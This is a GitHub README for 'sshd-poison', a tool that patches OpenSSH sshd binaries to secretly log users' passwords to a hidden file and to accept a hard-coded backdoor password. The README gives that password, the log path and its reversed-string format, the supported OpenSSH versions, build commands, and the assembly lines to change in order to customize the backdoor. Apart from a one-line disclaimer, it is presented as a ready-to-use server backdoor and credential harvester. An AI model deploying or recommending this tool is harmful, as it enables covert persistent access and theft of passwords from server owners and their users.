Skip to content

sshd-poison is a tool that modifies a sshd binary to capture password-based authentications and allows you to login in some accounts using a magic-pass.

Notifications You must be signed in to change notification settings

hc0d3r/sshd-poison

Repository files navigation

sshd-poison

sshd-poison is a tool that modifies a sshd binary to capture password-based authentications and allows you to login in some accounts using a magic-pass.

This only works with x86_64-elf file. Should work with openssh 7.7p1 up to 8.3p1. The code need some modifications to work with older versions.

OpenSSH versions tested:

  • OpenSSH_7.9p1 Debian-10+deb10u2, OpenSSL 1.1.1d 10 Sep 2019
  • OpenSSH_8.3p1, OpenSSL 1.1.1g 21 Apr 2020

Magic-pass

Unhappily, the power of this magic is a bit limited. If you try login as root, and root login is not allowed, or if the user isn't valid, it won't work.

magic-pass is anneeeeeeeeeeee.

Logfile

Captured passwords are stored in /tmp/.nothing.

The strings are saved in reverse order in the following format: \0password\0user\0ip, or rather \0drowssap\0resu\0pi.

Compiling

$ git clone --recurse-submodules https://github.com/hc0d3r/sshd-poison
$ cd sshd-poison
$ make

If you want a different magic-pass/logfile, edit the following lines in sc.asm.

magic_pass: db 'anneeeeeeeeeeee', 0x0
logfile: db '/tmp/.nothing', 0x0

Demo

Legal disclaimer

Use for illegal purposes are not allowed.

Contributing

You can help with code, or donating money. If you wanna help with code, use the kernel code style as a reference.

Paypal:

BTC: 19p3bnJ1t7DByfD8LdgU6WRSnUc2ftBxkP

About

sshd-poison is a tool that modifies a sshd binary to capture password-based authentications and allows you to login in some accounts using a magic-pass.

Topics

Resources

Stars

Watchers

Forks

Packages

No packages published